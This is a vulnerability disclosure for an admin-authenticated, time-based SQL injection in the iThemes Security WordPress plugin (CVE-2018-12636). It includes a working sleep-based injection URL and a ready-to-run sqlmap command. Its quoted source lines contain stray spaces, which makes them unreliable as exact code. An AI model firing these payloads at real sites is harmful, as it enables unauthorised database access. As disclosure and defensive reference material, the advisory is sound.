iThemes Security <= 7.0.2 – Authenticated SQL Injection | CVE 2018-12636

Description

The iThemes Security (better-wp-security) plugin before 7.0.3 for WordPress allows SQL Injection (by attackers with Admin privileges) via the logs page.

Vulnerability description:

iThemes Security appears to be vulnerable to time-based SQL-Injection.

Parameter orderby is vulnerable because backend variable $sort_by_column
is not escaped.

Privileges required: Admin user.

Technical details:

File: better-wp-security/core/admin-pages/logs-list-table.php
Line 271: if ( isset( $_GET[' orderby '], $_GET['order'] ) ) {
Line 272: $ sort_by_column = $_GET[' orderby '];

File: better-wp-security/core/lib/log-util.php
Line 168: $query .= ' ORDER BY ' . implode( ', ', $ sort_by_column ));

Proof of Concept

The following GET request will cause the SQL query to execute and sleep for 10 seconds if clicked on as an authenticated admin:

http://localhost/wordpress/wp-admin/admin.php?page=itsec-logs&filter=malware&orderby=remote_ip%2c(select*from(select(sleep(10)))a)&order=asc&paged=0

Using SQLMAP:

sqlmap -u 'http://localhost/wp-admin/admin.php?page=itsec-logs&filter=malware&orderby=remote_ip*&order=asc&paged=0' --cookie "wordpress_b...; wordpress_logged_in_bbf...;" --string "WordPress" --dbms=MySQL --technique T --level 5 --risk 3